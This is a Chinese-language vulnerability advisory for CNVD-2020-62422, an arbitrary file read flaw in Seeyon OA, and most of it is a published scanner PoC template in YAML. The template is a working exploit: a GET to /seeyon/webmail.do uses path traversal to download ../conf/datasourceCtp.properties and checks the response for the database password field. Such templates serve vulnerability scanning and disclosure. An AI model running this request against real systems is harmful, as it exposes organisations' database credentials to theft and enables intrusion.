CNVD-2020-62422: 致远oa系统存在任意文件读取漏洞

日期: 2025-08-01 | 影响软件: 致远oa系统 | POC: 已公开

漏洞描述

致远OA存在任意文件下载漏洞,攻击者可利用该漏洞下载任意文件,获取敏感信息 app="致远互联-OA"

PoC代码[已公开]

id: CNVD-2020-62422

info:
  name: 致远oa系统存在任意文件读取漏洞
  author: Aquilao
  severity: high
  description: |
    致远OA存在任意文件下载漏洞,攻击者可利用该漏洞下载任意文件,获取敏感信息
    app="致远互联-OA"
  reference:
    - https://www.CNVD.org.cn/flaw/show/CNVD-2020-62422
  tags: cnvd,cnvd2020,seeyon,fileread
  created: 2020/12/15

rules:
  r0:
    request:
      method: GET
      path: /seeyon/webmail.do?method=doDownloadAtt&filename=index.jsp&filePath=../conf/datasourceCtp.properties
    expression: response.status == 200 && response.content_type.icontains("application/x-msdownload") && response.body.bcontains(b"ctpDataSource.password")
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CNVD/2020/CNVD-2020-62422.yaml

相关漏洞推荐